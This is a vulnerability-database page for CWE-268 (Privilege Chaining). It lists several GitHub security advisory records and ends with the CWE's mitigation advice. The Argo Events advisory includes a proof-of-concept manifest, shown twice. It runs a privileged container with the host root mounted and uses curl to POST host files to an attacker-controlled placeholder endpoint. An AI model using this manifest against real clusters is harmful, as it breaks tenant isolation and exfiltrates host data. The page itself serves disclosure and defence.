Common Weakness Enumeration

CWE-268

Allowed

Privilege Chaining

Abstraction: Base · Status: Draft

Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that combination.

45 vulnerabilities reference this CWE, most recent first.

GHSA-C26R-VW7P-2M7H

Vulnerability from github – Published: 2025-04-03 18:30 – Updated: 2025-04-04 15:31
VLAI
Details

OpenVPN version 2.4.0 through 2.6.10 on Windows allows an external, lesser privileged process to create a named pipe which the OpenVPN GUI component would connect to allowing it to escalate its privileges

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-4877"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-268"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-03T16:15:32Z",
    "severity": "HIGH"
  },
  "details": "OpenVPN version 2.4.0 through 2.6.10 on Windows allows an external, lesser privileged process to create a named pipe which the OpenVPN GUI component would connect to allowing it to escalate its privileges",
  "id": "GHSA-c26r-vw7p-2m7h",
  "modified": "2025-04-04T15:31:15Z",
  "published": "2025-04-03T18:30:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4877"
    },
    {
      "type": "WEB",
      "url": "https://community.openvpn.net/openvpn/wiki/CVE-2024-4877"
    },
    {
      "type": "WEB",
      "url": "https://www.mail-archive.com/openvpn-users@lists.sourceforge.net/msg07634.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F2MG-6C44-P58C

Vulnerability from github – Published: 2025-08-12 21:31 – Updated: 2025-08-12 21:31
VLAI
Details

IBM WebSphere Application Server Liberty 17.0.0.3 through 25.0.0.8 could allow a remote attacker to bypass security restrictions caused by a failure to honor JMS messaging configuration

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-36124"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-268"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-12T19:15:29Z",
    "severity": "MODERATE"
  },
  "details": "IBM WebSphere Application Server Liberty 17.0.0.3 through 25.0.0.8 could allow a remote attacker to bypass security restrictions caused by a failure to honor JMS messaging configuration",
  "id": "GHSA-f2mg-6c44-p58c",
  "modified": "2025-08-12T21:31:20Z",
  "published": "2025-08-12T21:31:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36124"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7242027"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F99G-PG48-WRFC

Vulnerability from github – Published: 2021-11-15 23:19 – Updated: 2021-11-17 21:13
VLAI
Summary
twill is vulnerable to Cross-Site Request Forgery (CSRF)
Details

twill is vulnerable to Cross-Site Request Forgery (CSRF).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "area17/twill"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "area17/twill"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-3932"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-268",
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-11-15T21:56:41Z",
    "nvd_published_at": "2021-11-13T09:15:00Z",
    "severity": "MODERATE"
  },
  "details": "twill is vulnerable to Cross-Site Request Forgery (CSRF).",
  "id": "GHSA-f99g-pg48-wrfc",
  "modified": "2021-11-17T21:13:01Z",
  "published": "2021-11-15T23:19:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3932"
    },
    {
      "type": "WEB",
      "url": "https://github.com/area17/twill/commit/5cded9fc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/area17/twill/commit/81d80d1fbbdd8bb73c020f03c623fd4487bd9b78"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/area17/twill"
    },
    {
      "type": "WEB",
      "url": "https://github.com/area17/twill/commits/bab94c1e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/area17/twill/releases/tag/1.2.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/area17/twill/releases/tag/2.5.3"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/6ef21e34-f6d9-445a-b657-375c53dc2b43"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "twill is vulnerable to Cross-Site Request Forgery (CSRF)"
}

GHSA-GG6V-F3WC-F9FG

Vulnerability from github – Published: 2023-10-29 03:30 – Updated: 2023-10-29 03:30
VLAI
Details

Privilege Chaining in GitHub repository hestiacp/hestiacp prior to 1.8.9.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-5839"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-268"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-10-29T01:15:41Z",
    "severity": "HIGH"
  },
  "details": "Privilege Chaining in GitHub repository hestiacp/hestiacp prior to 1.8.9.",
  "id": "GHSA-gg6v-f3wc-f9fg",
  "modified": "2023-10-29T03:30:30Z",
  "published": "2023-10-29T03:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5839"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hestiacp/hestiacp/commit/acb766e1db53de70534524b3fbc2270689112630"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/21125f12-64a0-42a3-b218-26b9945a5bc0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GRPW-JGRW-CCQR

Vulnerability from github – Published: 2026-03-17 15:36 – Updated: 2026-03-18 06:31
VLAI
Details

Local privilege escalation in snapd on Linux allows local attackers to get root privilege by re-creating snap's private /tmp directory when systemd-tmpfiles is configured to automatically clean up this directory. This issue affects Ubuntu 16.04 LTS, 18.04 LTS, 20.04 LTS, 22.04 LTS, and 24.04 LTS.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-3888"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-268"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-17T14:16:17Z",
    "severity": "HIGH"
  },
  "details": "Local privilege escalation in snapd on Linux allows local attackers to get root privilege by re-creating snap\u0027s private /tmp directory when systemd-tmpfiles is configured to automatically clean up this directory. This issue affects Ubuntu 16.04 LTS, 18.04 LTS, 20.04 LTS, 22.04 LTS, and 24.04 LTS.",
  "id": "GHSA-grpw-jgrw-ccqr",
  "modified": "2026-03-18T06:31:19Z",
  "published": "2026-03-17T15:36:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3888"
    },
    {
      "type": "WEB",
      "url": "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/17/cve-2026-3888-important-snap-flaw-enables-local-privilege-escalation-to-root"
    },
    {
      "type": "WEB",
      "url": "https://cdn2.qualys.com/advisory/2026/03/17/snap-confine-systemd-tmpfiles.txt"
    },
    {
      "type": "WEB",
      "url": "https://discourse.ubuntu.com/t/snapd-local-privilege-escalation-cve-2026-3888"
    },
    {
      "type": "WEB",
      "url": "https://ubuntu.com/security/CVE-2026-3888"
    },
    {
      "type": "WEB",
      "url": "https://ubuntu.com/security/notices/USN-8102-1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/03/18/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H647-28XP-2HC8

Vulnerability from github – Published: 2022-05-24 16:44 – Updated: 2024-04-04 00:11
VLAI
Details

It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-3844"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-268"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-04-26T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.",
  "id": "GHSA-h647-28xp-2hc8",
  "modified": "2024-04-04T00:11:49Z",
  "published": "2022-05-24T16:44:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b%40%3Cissues.bookkeeper.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4%40%3Cissues.bookkeeper.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20190619-0002"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4269-1"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/108096"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HJW2-8P34-88RJ

Vulnerability from github – Published: 2024-09-26 06:30 – Updated: 2024-09-26 18:31
VLAI
Details

User interface (UI) misrepresentation of critical information issue exists in multiple Home GateWay/Hikari Denwa routers provided by NIPPON TELEGRAPH AND TELEPHONE EAST CORPORATION. If this vulnerability is exploited, an attacker who identified WAN-side IPv6 address may access the product's Device Setting page via WAN-side. Note that, affects products are also provided by NIPPON TELEGRAPH AND TELEPHONE WEST CORPORATION, but the vulnerability only affects products subscribed and used in NIPPON TELEGRAPH AND TELEPHONE EAST CORPORATION areas.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-47045"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-268",
      "CWE-451"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-26T04:15:07Z",
    "severity": "HIGH"
  },
  "details": "User interface (UI) misrepresentation of critical information issue exists in multiple Home GateWay/Hikari Denwa routers provided by NIPPON TELEGRAPH AND TELEPHONE EAST CORPORATION. If this vulnerability is exploited, an attacker who identified WAN-side IPv6 address may access the product\u0027s Device Setting page via WAN-side. Note that, affects products are also provided by NIPPON TELEGRAPH AND TELEPHONE WEST CORPORATION, but the vulnerability only affects products subscribed and used in NIPPON TELEGRAPH AND TELEPHONE EAST CORPORATION areas.",
  "id": "GHSA-hjw2-8p34-88rj",
  "modified": "2024-09-26T18:31:43Z",
  "published": "2024-09-26T06:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47045"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN57749899"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN78356367"
    },
    {
      "type": "WEB",
      "url": "https://web116.jp/ced/support/version/broadband/500mi"
    },
    {
      "type": "WEB",
      "url": "https://web116.jp/ced/support/version/broadband/600mi"
    },
    {
      "type": "WEB",
      "url": "https://web116.jp/ced/support/version/broadband/pr_400mi"
    },
    {
      "type": "WEB",
      "url": "https://web116.jp/ced/support/version/broadband/rt_400mi"
    },
    {
      "type": "WEB",
      "url": "https://web116.jp/ced/support/version/broadband/rv_440mi"
    },
    {
      "type": "WEB",
      "url": "https://www.e-tax.nta.go.jp/topics/2024/topics_20240924_versionup.htm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HMP7-X699-CVHQ

Vulnerability from github – Published: 2025-04-14 17:47 – Updated: 2025-04-23 15:07
VLAI
Summary
Argo Events users can gain privileged access to the host system and cluster with EventSource and Sensor CR
Details

Summary:

A user with permission to create/modify EventSource and Sensor custom resources can gain privileged access to the host system and cluster, even without having direct administrative privileges.

Details:

The EventSource and Sensor CRs allow the corresponding orchestrated pod to be customized with spec.template and spec.template.container (with type k8s.io/api/core/v1.Container), thus, any specification under container such as command, args, securityContext, volumeMount can be specified, and applied to the EventSource or Sensor pod due to the code logic below.

    if args.EventSource.Spec.Template != nil && args.EventSource.Spec.Template.Container != nil {
        if err := mergo.Merge(&eventSourceContainer, args.EventSource.Spec.Template.Container, mergo.WithOverride); err != nil {
            return nil, err
        }
    }

With these, A user would be able to gain privileged access to the cluster host, if he/she specified the EventSource/Sensor CR with some particular properties under template.

Here is an example that demonstrates the vulnerability.

apiVersion: argoproj.io/v1alpha1
kind: EventSource
metadata:
  name: poc-vulnerable-eventsource
spec:
  webhook:
    security-test:
      port: "12000"
      endpoint: "/webhook"
  template:
    container:
      image: ubuntu:latest
      command: ["/bin/bash"]
      args: [
        "-c",
        "apt-get update && apt-get install -y curl && while true; do
         rm -f /tmp/data;
         echo '=== containerd socket ===' > /tmp/data 2>&1;
         ls -la /host/run/containerd/containerd.sock >> /tmp/data 2>&1;
         echo '=== proof of host access ===' >> /tmp/data 2>&1;
         cat /host/etc/hostname >> /tmp/data 2>&1;
         curl -X POST --data-binary @/tmp/data http://<attacker-controlled-endpoint>:8000/;
         sleep 300;
         done"
      ]
      securityContext:
        privileged: true
        capabilities:
          add: ["SYS_ADMIN"]
      volumeMounts:
        - name: host-root
          mountPath: /host
    volumes:
      - name: host-root
        hostPath:
          path: /

Impact:

  • Multi-tenant Clusters:
  • Tenant isolation broken
  • Non-admin users can gain host/cluster access
  • Access to other tenants' data

  • Security Model Bypass:

  • RBAC restrictions circumvented
  • Pod Security Policies/Standards bypassed
  • Host system compromised

Patches

A patch for this vulnerability has been released in the following Argo Events version , which only limited properties under spec.template.container are allowed.

v1.9.6

Credits

This vulnerability was found & reported by:

@thevilledev

The Argo team would like to thank him for his responsible disclosure and constructive communications during the resolve of this issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-events"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-32445"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-250",
      "CWE-268"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-14T17:47:39Z",
    "nvd_published_at": "2025-04-15T20:15:39Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary:\n\nA user with permission to create/modify EventSource and Sensor custom resources can gain privileged access to the host system and cluster, even without having direct administrative privileges.\n\n### Details:\n\nThe `EventSource` and `Sensor` CRs allow the corresponding orchestrated pod to be customized with `spec.template` and `spec.template.container` (with type `k8s.io/api/core/v1.Container`), thus, any specification under `container` such as `command`, `args`, `securityContext `, `volumeMount` can be specified, and applied to the EventSource or Sensor pod due to the code logic below.\n\n```golang\n    if args.EventSource.Spec.Template != nil \u0026\u0026 args.EventSource.Spec.Template.Container != nil {\n        if err := mergo.Merge(\u0026eventSourceContainer, args.EventSource.Spec.Template.Container, mergo.WithOverride); err != nil {\n            return nil, err\n        }\n    }\n```\n\nWith these, A user would be able to gain privileged access to the cluster host, if he/she specified the EventSource/Sensor CR with some particular properties under `template`.\n\nHere is an example that demonstrates the vulnerability.\n\n```\napiVersion: argoproj.io/v1alpha1\nkind: EventSource\nmetadata:\n  name: poc-vulnerable-eventsource\nspec:\n  webhook:\n    security-test:\n      port: \"12000\"\n      endpoint: \"/webhook\"\n  template:\n    container:\n      image: ubuntu:latest\n      command: [\"/bin/bash\"]\n      args: [\n        \"-c\",\n        \"apt-get update \u0026\u0026 apt-get install -y curl \u0026\u0026 while true; do\n         rm -f /tmp/data;\n         echo \u0027=== containerd socket ===\u0027 \u003e /tmp/data 2\u003e\u00261;\n         ls -la /host/run/containerd/containerd.sock \u003e\u003e /tmp/data 2\u003e\u00261;\n         echo \u0027=== proof of host access ===\u0027 \u003e\u003e /tmp/data 2\u003e\u00261;\n         cat /host/etc/hostname \u003e\u003e /tmp/data 2\u003e\u00261;\n         curl -X POST --data-binary @/tmp/data http://\u003cattacker-controlled-endpoint\u003e:8000/;\n         sleep 300;\n         done\"\n      ]\n      securityContext:\n        privileged: true\n        capabilities:\n          add: [\"SYS_ADMIN\"]\n      volumeMounts:\n        - name: host-root\n          mountPath: /host\n    volumes:\n      - name: host-root\n        hostPath:\n          path: /\n```\n\n### Impact:\n\n- Multi-tenant Clusters:\n  - Tenant isolation broken\n  - Non-admin users can gain host/cluster access\n  - Access to other tenants\u0027 data\n\n- Security Model Bypass:\n  - RBAC restrictions circumvented\n  - Pod Security Policies/Standards bypassed\n  - Host system compromised\n\n### Patches\n\nA [patch](https://github.com/argoproj/argo-events/pull/3528) for this vulnerability has been released in the following Argo Events version , which only limited properties under `spec.template.container` are allowed.\n\n`v1.9.6`\n\n### Credits\n\nThis vulnerability was found \u0026 reported by:\n\n@thevilledev\n\nThe Argo team would like to thank him for his responsible disclosure and constructive communications during the resolve of this issue.",
  "id": "GHSA-hmp7-x699-cvhq",
  "modified": "2025-04-23T15:07:31Z",
  "published": "2025-04-14T17:47:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-events/security/advisories/GHSA-hmp7-x699-cvhq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32445"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-events/pull/3528"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-events/commit/18412293a699f559848b00e6e459c9ce2de0d3e2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-events"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3608"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Argo Events users can gain privileged access to the host system and cluster with EventSource and Sensor CR "
}

GHSA-HXV8-F44W-4G6H

Vulnerability from github – Published: 2023-04-24 21:30 – Updated: 2024-04-04 03:40
VLAI
Details

A flaw was found in the Open Cluster Management (OCM) when a user have access to the worker nodes which has the cluster-manager-registration-controller or cluster-manager deployments. A malicious user can take advantage of this and bind the cluster-admin to any service account or using the service account to list all secrets for all kubernetes namespaces, leading into a cluster-level privilege escalation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-2250"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-268"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-24T21:15:09Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was found in the Open Cluster Management (OCM) when a user have access to the worker nodes which has the cluster-manager-registration-controller or cluster-manager deployments. A malicious user can take advantage of this and bind the cluster-admin to any service account or using the service account to list all secrets for all kubernetes namespaces, leading into a cluster-level privilege escalation.",
  "id": "GHSA-hxv8-f44w-4g6h",
  "modified": "2024-04-04T03:40:16Z",
  "published": "2023-04-24T21:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2250"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-cluster-management-io/registration-operator/pull/344"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MG79-739C-7PM9

Vulnerability from github – Published: 2025-07-02 00:30 – Updated: 2025-07-02 00:30
VLAI
Details

No cwe for this issue in Microsoft Edge (Chromium-based) allows an unauthorized attacker to disclose information over a network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-49741"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-268"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-01T23:15:30Z",
    "severity": "HIGH"
  },
  "details": "No cwe for this issue in Microsoft Edge (Chromium-based) allows an unauthorized attacker to disclose information over a network.",
  "id": "GHSA-mg79-739c-7pm9",
  "modified": "2025-07-02T00:30:31Z",
  "published": "2025-07-02T00:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49741"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49741"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-49
Architecture and Design

Strategy: Separation of Privilege

Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.

Mitigation MIT-1
Architecture and Design Operation

Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.

Mitigation MIT-17
Architecture and Design Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

No CAPEC attack patterns related to this CWE.